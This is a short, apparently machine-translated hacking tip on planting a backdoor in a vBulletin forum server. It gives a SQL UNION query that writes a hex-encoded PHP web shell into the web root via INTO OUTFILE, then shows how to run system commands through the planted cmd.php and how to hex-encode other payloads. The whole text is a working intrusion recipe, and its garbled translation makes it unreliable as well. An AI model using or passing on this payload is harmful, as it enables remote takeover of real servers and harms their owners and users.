Generates the method of latter horse!
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c: /inetpub/wwwroot/cmd.php'
VBB_STRIKES is a table in the VB Forum!
The c: / inetpub / wwwroot / under the PHPMYADPUB / WWWROOT / CMD.PHP file is generated, the content is the original VBB_STRIKES content, followed by:
2 3
Then passenger DOS commands can be executed by http://www.xxx.com/cmd.php?cmd=dir c: /
Which 0x3c3f7068702073797374656d28245f524551554553545 b636d645d293b3f3e is something?
Isn't it The hexadecimal code is encoded. If this method does not have this method, other encodings will appear in different SQL: If the% XX is, which back door It is not possible! If you have other command statements, you can enter the UltraEdit, press the [CTRL H] button, you can connect the hexadecimal inside!
